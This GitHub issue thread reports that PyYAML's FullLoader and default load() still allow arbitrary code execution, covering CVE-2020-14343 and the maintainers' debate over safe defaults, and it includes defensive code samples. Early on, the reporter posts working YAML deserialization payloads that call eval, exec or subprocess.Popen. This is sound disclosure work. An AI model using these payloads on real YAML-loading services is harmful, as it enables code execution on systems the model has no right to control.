.load() and FullLoader still vulnerable to fairly trivial RCE #420

arxenix · 2020-07-22T08:18:35Z

As of 5.3.1 .load() defaults to using FullLoader and FullLoader is still vulnerable to RCE when run on untrusted input. As demonstrated by the examples below, #386 was not enough to fix this issue.

Some example payloads:

!!python/object/new:tuple 
- !!python/object/new:map 
  - !!python/name:eval
  - [ "RCE_HERE" ]

!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "RCE_HERE"

- !!python/object/new:str
    args: []
    state: !!python/tuple
    - "RCE_HERE"
    - !!python/object/new:staticmethod
      args: [0]
      state:
        update: !!python/name:exec

I do not believe this is entirely fixable unless PyYAML decides to use secure defaults, and make .load() equivalent to .safe_load() ( #5 )
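To make the contrast concrete, here is a minimal sketch of how `safe_load` treats the first payload above. It assumes PyYAML is installed; the helper name `is_rejected_by_safe_load` is made up for illustration, and the payload keeps the harmless `RCE_HERE` placeholder. Nothing is evaluated, because the safe loader has no constructor for the `python/...` tags and refuses the document.

```python
import yaml

# First payload from this issue, with the placeholder argument left as-is.
payload = """
!!python/object/new:tuple
- !!python/object/new:map
  - !!python/name:eval
  - [ "RCE_HERE" ]
"""

def is_rejected_by_safe_load(text):
    """Return True if yaml.safe_load refuses to construct the document."""
    try:
        yaml.safe_load(text)
    except yaml.constructor.ConstructorError:
        # SafeLoader has no constructor registered for python-specific tags.
        return True
    return False

print(is_rejected_by_safe_load(payload))
# Plain data (mappings, lists, scalars) still loads normally.
print(yaml.safe_load("name: demo\nports: [80, 443]"))
```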

FullLoader should probably be removed, as I don't see the purpose of it.

ret2libc · 2020-07-23T09:10:38Z

I agree it should be well documented that FullLoader is not safe. A blacklist approach like the one I implemented in #386 is just too hard to maintain and although it can always be improved, it is just easier if users don't expect any kind of security protection from it.

ret2libc · 2020-07-23T11:10:01Z

Is a CVE going to be assigned for this? Also, to "avoid" this kind of problem in the future (and dealing with CVEs and so on), I think it should be made clear that FullLoader is not safe. As it stands, a user may think it is a good alternative to safe_load when it is not.

arxenix · 2020-07-23T14:17:26Z

I have not filed for a new CVE, but I contacted RedHat to see if the previous one (CVE-2020-1747) could be updated (I don't know if this is standard protocol here or not)

+1 on making it very clear that FullLoader is not safe. As of right now, I believe the only mention of FullLoader is in the page https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation , which claims that it "Avoids arbitrary code execution".

ret2libc · 2020-07-23T14:52:47Z

> I have not filed for a new CVE, but I contacted RedHat to see if the previous one (CVE-2020-1747) could be updated (I don't know if this is standard protocol here or not)

No, that is not possible. This should get a new CVE, with a wording like "Incomplete fix for CVE-2020-1747 still allows to execute arbitrary code through FullLoader", or something like that.

ret2libc · 2020-07-24T13:05:47Z

@ingydotnet @perlpunk @arxenix Has any of you already requested a CVE (other than from Red Hat)? If not, Red Hat can assign the CVE for this.

Also, @ingydotnet what do you intend to do with regard to documenting the unsafe behaviour of FullLoader?

perlpunk · 2020-07-24T15:40:05Z

My personal preference would still be to make SafeLoader the default.
FullLoader is probably not that useful anymore anyway, especially if python/name also gets moved to UnsafeLoader.

arxenix · 2020-07-24T15:55:17Z

@ret2libc I sent a request for a new CVE ID to RedHat already

ingydotnet · 2020-07-24T16:15:31Z

I was considering pulling tag:yaml.org,2002:python/name: from FullLoader construction.
@perlpunk why do you feel that leaves FullLoader irrelevant?

ret2libc · 2020-07-24T16:17:07Z

> @ret2libc I sent a request for a new CVE ID to RedHat already

I know, I am from Red Hat. I just want to make sure no one else has already requested the CVE from someone else. @ingydotnet @perlpunk did you? Otherwise, I'm going to assign the CVE from the Red Hat pool.

perlpunk · 2020-07-24T16:20:09Z

@ret2libc no, I did not request one.

ingydotnet · 2020-07-24T16:31:42Z

@ret2libc no.

ingydotnet · 2020-07-24T16:44:05Z

@arxenix I'd like to see a FullLoader vulnerability that doesn't use tag:yaml.org,2002:python/name:....
An easy fix is to remove that constructor.
@ret2libc a release with that fix should not require a doc update.

ingydotnet · 2020-07-24T17:39:09Z

@perlpunk I don't see defaulting to SafeLoader as an option. We have no idea how much code that would break.

...

@everyoneelse,

Let's step back a sec and look at the problem we are trying to solve.
In my opinion "there was no problem" to begin with.

PyYAML was loud and clear in its doc from the first release that PyYAML (a serialization module) had the same vulnerability landscape as Pickle, i.e., it is not safe to load data from a source you cannot trust. Bad things could happen.

Don't compile and run C code from a web page's textarea.
Don't run Python code from there either.
Don't load a Pickle file you found on the street.
Don't do that with YAML either.

Somewhat ironically, we are encouraged and don't bat an eye about running setup.py or Makefile.PL or Rakefile files to install Python, Perl and Ruby modules. We trust that files pushed to PyPI or committed to GitHub are safe enough.

Who are we trying to protect? This is a literal question. I would like to see the actual applications that are affected. Show me the people that are asking for untraceable YAML from unknown sources and loading it for them with PyYAML.

This "became my problem" when a CVE was filed against PyYAML for something that was effectively "people can get hurt when they use your dining utensils, and don't read the instructions and use it to eat things from a dumpster". Not that I cared about the CVE, since I felt exactly the same as I do now, but the CVE triggered all kinds of production systems. I was forced to take an action that was unnecessary. I never knew who filed the CVE or how to respond to them. I never got a confirmation that the original CVE was closed.

I tried to find a middle ground with warnings to read the docs, be explicit in your code, and provide a safer default.

I agree that the FullLoader safety is proving to be not that useful.

I'm currently leaning towards making FullLoader an alias for UnsafeLoader, keeping that as the default, documenting it, and calling it a day.

arxenix · 2020-07-24T18:19:48Z

@ingydotnet it's still possible to get arbitrary code execution with only !!python/object/new , BTW

!!python/object/new:tuple [!!python/object/new:map [!!python/object/new:type [!!python/object/new:subprocess.Popen {}], ['ls']]]

Ultimately, it's your choice what you decide to do with the library, but let me state my opinions.

I definitely have seen projects in the wild that are loading YAML via yaml.load() from untrusted sources. I can't disclose specific names but one example is a web portal that allowed users to upload YAML config files, and then loaded them. Given some time, I could probably find several on GitHub if you would like.

Developers tend to be lazy; no one wants to read the docs. This is why it's important to follow the principle of having secure defaults. It's important for a library to attempt to protect its users (even if they don't read :p)

Here's a quote from the ReactJS (popular Facebook-made frontend library) documentation which explains their reasoning for their function dangerouslySetInnerHTML. I wholeheartedly agree with them.

> Improper use of the innerHTML can open you up to a cross-site scripting (XSS) attack. Sanitizing user input for display is notoriously error-prone, and failure to properly sanitize is one of the leading causes of web vulnerabilities on the internet.
>
> Our design philosophy is that it should be “easy” to make things safe, and developers should explicitly state their intent when performing “unsafe” operations. The prop name dangerouslySetInnerHTML is intentionally chosen to be frightening, and the prop value (an object instead of a string) can be used to indicate sanitized data.
>
> After fully understanding the security ramifications and properly sanitizing the data, create a new object containing only the key __html and your sanitized data as the value.

My observations are that the mental model that many developers have of YAML is that it's a simple data interchange format exactly like JSON. Not a complex serialization language. In the same way they don't expect json.load() to lead to code execution, they don't expect yaml.load() to lead to code execution.
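A small sketch of that mental model, assuming PyYAML is installed: for a plain JSON-style document, `json.loads` and `yaml.safe_load` give the same Python data, which is what most callers expect from a "load" function. The sample document is made up.

```python
import json
import yaml

# A made-up config document that is valid as both JSON and YAML.
doc = '{"name": "demo", "ports": [80, 443], "debug": false}'

as_json = json.loads(doc)
as_yaml = yaml.safe_load(doc)

# Both loaders produce the same plain dict/list/scalar structure.
print(as_json == as_yaml)
```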

I also believe that it is okay to break backwards compatibility in favor of security. How many people are really relying on PyYAML's ability to serialize complex objects? I don't have too much insight into this, but my thoughts are -- not many.

From some quick GitHub code searches that I did, there are ~762k files that use PyYAML. Of those, up to 529k files are currently using the default FullLoader as the loading mechanism, which is vulnerable to arbitrary code execution. 220k call safe_load or specify SafeLoader, and only 13k explicitly use unsafe_load or specify UnsafeLoader.

perlpunk · 2020-07-24T18:28:54Z

I'm not a python expert, but I think that FullLoader in its current state already prevents (de)serializing most objects as they are dumped with python/object/apply (please correct me if I am wrong). So it might be that a lot of code already had to be modified for PyYAML >= 5 to use UnsafeLoader.

Regarding the default: The problem I see is that most use cases for YAML do not involve serializing objects. Many people simply do not expect the default load method to do full serialization, and many are not even aware that YAML was designed for allowing that. That's different from Pickle.

I think anything different from the default YAML Core Schema (or the basic 1.1 types) should be optional for any YAML implementation.

Yes, it is documented that PyYAML does this, and yes, changing it will break more things (additionally to code that already broke).
I'm just saying what I would expect, and how I would implement a YAML library. Saying "it's documented that it's unsafe" is often not enough.

ingydotnet · 2020-07-24T18:55:45Z

@arxenix @perlpunk These are reasonable points. Thanks for the contrast. I'll sleep on it and reply tomorrow.

arxenix · 2020-07-25T08:19:32Z

This was assigned CVE-2020-14343

ingydotnet · 2020-07-25T15:33:39Z

I am thinking about how to move towards safe_load as the default load() action. I need more time to plan that.

@arxenix, just wondering, can you think of an exploit that involves just !!python/object:__main__.Foo and/or !!python/tuple?
These are the forms for serializing simple instances and tuples.

import yaml

class Foo:
    def __init__(self):
        self.bar = 42

print(yaml.dump(Foo()))
print(yaml.dump(yaml.full_load(yaml.dump(Foo()))))

print(yaml.dump((1,2,3)))
print(yaml.dump(yaml.full_load(yaml.dump((1,2,3)))))

prints:

!!python/object:__main__.Foo
bar: 42

!!python/object:__main__.Foo
bar: 42

!!python/tuple
- 1
- 2
- 3

!!python/tuple
- 1
- 2
- 3

arxenix · 2020-07-25T18:50:37Z

@ingydotnet if it's limited to only those two tags (!!python/tuple and !!python/object:__main__.Foo) I am pretty confident that it's safe.

But the moment you start allowing classes other than __main__.Foo as well (e.g. from other modules, or built-ins) it becomes vulnerable.

If you're concerned about breaking too many projects, maybe a reasonable thing could be to only allow classes from the __main__ namespace. But I feel it's strange behavior, as code would break if it's imported elsewhere.

My recommendation would be to make FullLoader not allow !!python/object/new , !!python/object, !!python/module or !!python/object/apply. The rest of the tags should be fine.
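For anyone who only needs a tag or two beyond the safe set, here is a rough sketch of the allowlist direction. Note it is not the change proposed above (removing tags from FullLoader); instead it starts from `SafeLoader` and adds back only `!!python/tuple`. The names `TupleOnlyLoader` and `_construct_tuple` are hypothetical; `add_constructor` and `construct_sequence` are existing PyYAML calls.

```python
import yaml

class TupleOnlyLoader(yaml.SafeLoader):
    """Hypothetical loader: SafeLoader plus the !!python/tuple tag only."""

def _construct_tuple(loader, node):
    # Build the items with the safe sequence constructor, then freeze them.
    return tuple(loader.construct_sequence(node))

# Registers the constructor on this subclass only; SafeLoader is unchanged.
TupleOnlyLoader.add_constructor("tag:yaml.org,2002:python/tuple", _construct_tuple)

print(yaml.load("!!python/tuple [1, 2, 3]", Loader=TupleOnlyLoader))

try:
    # Any other python/... tag still has no constructor and is refused.
    yaml.load("!!python/object/new:tuple [[1, 2, 3]]", Loader=TupleOnlyLoader)
except yaml.constructor.ConstructorError as exc:
    print("rejected:", exc.problem)
```

Because the constructor is registered on the subclass, code elsewhere that calls `yaml.safe_load` keeps its stricter behaviour.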

ret2libc · 2020-07-27T08:16:10Z

Also, note that it is written nowhere that FullLoader should not be used on untrusted input (or at least I could not find it). Actually, the documentation says that FullLoader does not execute arbitrary code, so that is why it becomes, again, "your problem" and a CVE-worthy issue. Because the documentation says "FullLoader: Loads the full YAML language. Avoids arbitrary code execution", users may rely on that "safe" behaviour and they would be at risk from this.

Independently of what you choose for the default load method, I suggest making this point clear in the documentation.

nextgens · 2020-07-28T06:40:03Z

> This "became my problem" when a CVE was filed against PyYAML for something that was effectively "people can get hurt when they use your dining utensils, and don't read the instructions and use it to eat things from a dumpster". Not that I cared about the CVE, since I felt exactly the same as I do now, but the CVE triggered all kinds of production systems. I was forced to take an action that was unnecessary. I never knew who filed the CVE or how to respond to them. I never got a confirmation that the original CVE was closed.
>
> I tried to find a middle ground with warnings to read the docs, be explicit in your code, and provide a safer default.
>
> I agree that the FullLoader safety is proving to be not that useful.
>
> I'm currently leaning towards making FullLoader an alias for UnsafeLoader, keeping that as the default, documenting it, and calling it a day.

Have you considered signing (HMACing) the serialized blob to ensure at unserialization time that it is trusted (has been serialized by someone who had the key)? This would solve the security problem and may be done in a way that the current parser ignores... so that existing apps keep functioning and no behaviour change is necessary.

This is a very common way (for other frameworks in other languages) to solve the security problem.
https://snuffleupagus.readthedocs.io/features.html#unserialize-related-magic
https://docs.oracle.com/javase/7/docs/api/java/security/SignedObject.html
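As a rough sketch of the signing idea, using only the Python standard library: the serialized blob gets an HMAC-SHA256 tag in a leading YAML comment line (so a parser would ignore it), and the tag is checked before anything is deserialized. The `# hmac-sha256:` line format, the function names and the key are all assumptions for illustration; PyYAML has no such feature.

```python
import hashlib
import hmac

PREFIX = b"# hmac-sha256: "  # hypothetical header; a YAML parser sees a comment

def sign(blob: bytes, key: bytes) -> bytes:
    """Prepend a comment line carrying the hex HMAC-SHA256 of the blob."""
    tag = hmac.new(key, blob, hashlib.sha256).hexdigest().encode("ascii")
    return PREFIX + tag + b"\n" + blob

def verify(signed: bytes, key: bytes) -> bytes:
    """Return the original blob, or raise ValueError if the tag is missing or wrong."""
    first_line, sep, blob = signed.partition(b"\n")
    if not sep or not first_line.startswith(PREFIX):
        raise ValueError("missing signature line")
    expected = hmac.new(key, blob, hashlib.sha256).hexdigest().encode("ascii")
    # compare_digest avoids leaking how many leading characters matched.
    if not hmac.compare_digest(first_line[len(PREFIX):], expected):
        raise ValueError("signature mismatch: refusing to deserialize")
    return blob

key = b"hypothetical-secret-key"
signed = sign(b"bar: 42\n", key)
print(verify(signed, key))
```

Only after `verify` returns would the blob be handed to a loader. This protects data the application serialized itself; it does not help when the YAML legitimately comes from users who do not hold the key.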

ingydotnet · 2020-08-07T00:48:04Z

@ret2libc Agreed. I'll update the doc this weekend, even if it takes longer to decide how to play the whole thing.

axsaucedo · 2020-08-07T07:36:45Z

This was also flagged on our side, thanks for looking at this. Just to understand, does that mean the fix will just be mentioning it in the documentation? Would it be possible to rename the method to "insecure_full_load"? I'm conscious that just adding this to the docs would not be enough to actually stop this from being a common vulnerability.

Edit: Just caught up with the thread. It sounds like it may require further assessment given projects that would be affected by the breaking change caused by updating the top level load function.

One question: are there currently any capabilities for feature flags that could provide backwards compatibility if this breaking change were to be introduced? At least until the next major update (e.g. env vars, config file vars, build params, etc.)
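To illustrate what such a flag could look like on the application side, here is a sketch of a wrapper that picks the loader from an environment variable and defaults to the safe one. The variable name `APP_YAML_LOADER`, its values and `load_config` are hypothetical; PyYAML itself does not read any such variable.

```python
import os
import yaml

# Hypothetical flag name and values; PyYAML itself does not read this variable.
FLAG = "APP_YAML_LOADER"
LOADERS = {
    "safe": yaml.SafeLoader,  # default
    "full": yaml.FullLoader,  # legacy behaviour, explicit opt-in only
}

def load_config(text, environ=None):
    """Load YAML with the loader selected by the flag, defaulting to SafeLoader."""
    environ = os.environ if environ is None else environ
    choice = environ.get(FLAG, "safe")
    if choice not in LOADERS:
        raise ValueError(f"unknown {FLAG} value: {choice!r}")
    return yaml.load(text, Loader=LOADERS[choice])

print(load_config("a: 1", environ={}))
```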

ret2libc · 2020-09-01T15:26:07Z

Hi, is there any news about this?

encukou · 2020-09-08T11:02:57Z

Hello,
Is there any way I can help get the wiki – https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation#how-to-disable-the-warning – updated to remove the claim that FullLoader avoids arbitrary code execution?

ingydotnet · 2020-09-08T12:05:54Z

I have an idea of how I'd like to proceed. I'll write about it here this week, and also update the wiki page.

RCE resolved in new version yaml/pyyaml#420

PyYAML 5.4 was released a couple of days ago with a fix for:
- https://ubuntu.com/security/CVE-2020-14343
- yaml/pyyaml#420
- https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation

The changes otherwise appear to be backwards compatible:
- https://github.com/yaml/pyyaml/blob/5.4.1/CHANGES

Being able to use a later version is important for companies that have automatic dependency scanning for CVEs.

5.3.1 partially fixed the vulnerabilities disclosed in CVE-2020-1747. A complete fix was debated at yaml/pyyaml#420 and eventually got patched in 5.4.1.
Changeset: yaml/pyyaml@3.12...5.4.1
Signed-off-by: Nabarun Pal <pal.nabarun95@gmail.com>

ocervell · 2021-09-28T17:12:33Z

Any updates on when this might be fixed ?

ingydotnet · 2021-09-28T17:21:40Z

6.0 is ready for beta now. Will go out this week.

Original commit: a001f27 Per suggestion yaml#420 (comment) move a few constructors from full_load to unsafe_load.

yaml deleted a comment from huntr-helper Aug 5, 2020

axsaucedo mentioned this issue Aug 7, 2020

Resolve CVE for PyYAML - CVE-2020-14343 SeldonIO/seldon-core#2252

Closed

kamadorueda mentioned this issue Sep 13, 2020

[Security] Use yaml.SafeLoader instead of yaml.Loader/yaml.FullLoader (same as yaml.UnsafeLoader) awslabs/aws-cfn-template-flip#101

Closed

kennedyshead mentioned this issue Sep 15, 2020

Arbitrary Code Execution in pyaml 5.3.1 home-assistant/core#40102

Closed

jamesjer mentioned this issue Jan 25, 2021

PyYAML 5.4/5.4.1 breaks YAML loader networkx/networkx#4569

Closed

fabaff mentioned this issue Jan 27, 2021

Upgrade pyyaml to 5.4.1 (CVE-2020-14343) home-assistant/core#45624

Merged

21 tasks

qiluo-msft added a commit to sonic-net/sonic-buildimage that referenced this issue Jan 28, 2021

Bump pyyaml from 5.3.1 to 5.4.1 (#6511)

1c8d5ec

lguohan pushed a commit to sonic-net/sonic-buildimage that referenced this issue Feb 3, 2021

Bump pyyaml from 5.3.1 to 5.4.1 (#6511)

8f8520e

deran1980 pushed a commit to deran1980/sonic-buildimage that referenced this issue Feb 4, 2021

Bump pyyaml from 5.3.1 to 5.4.1 (sonic-net#6511)

b1b3f9b

kga mentioned this issue Feb 11, 2021

Update PyYAML to 5.4.1 to fix installation error on Python3.9 motemen/homebrew-furoshiki2#3

Merged

anli5005 mentioned this issue May 19, 2021

Add Challenge Checker 2 BCACTF/bcactf-2.0#34

Merged

ajdecon mentioned this issue Aug 24, 2021

Current Container and source has issues NVIDIA/ngc-container-replicator#28

Closed

chriddyp mentioned this issue Feb 7, 2022

MarkdownAIO plotly/dash-labs#82

Closed

10 tasks

tony-- mentioned this issue Mar 15, 2022

Require pyyaml 6.0+ due to CVE-2020-14343 oneapi-src/oneAPI-samples#890

Closed

3 tasks

perlpunk pushed a commit to perlpunk/pyyaml that referenced this issue Aug 2, 2022

Fix for CVE-2020-14343

cac92d7

perlpunk pushed a commit to perlpunk/pyyaml that referenced this issue Aug 2, 2022

Fix for CVE-2020-14343

66a7619

Dirac231 mentioned this issue Aug 16, 2022

Code Execution via unsafe method used in "snerg/nerf/utils.py" google-research/google-research#1239

Closed

progala mentioned this issue Aug 24, 2022

Dev python exercise 1 pke11y/gt-engineer-review#10

Open

johnmarkpittman mentioned this issue Dec 6, 2022

Update _magics.py vega/altair#2747

Merged

This was referenced Dec 26, 2022

Bump wheel from 0.32.1 to 0.38.1 threatworx/twigs#10

Open

Bump setuptools from 40.2.0 to 65.5.1 threatworx/twigs#11

Open

IKarasynskyi-SPD mentioned this issue Apr 28, 2023

SPHX-FOSS-CRITICAL-Arbitrary Code Execution Security-Phoenix-demo/Damn_Vulnerable_C_Program#37

Open

AlbertSusanto mentioned this issue Aug 22, 2023

YAML Constructor Error when adding import_schema_path parameter to pipeline dlt-hub/dlt#575

Closed
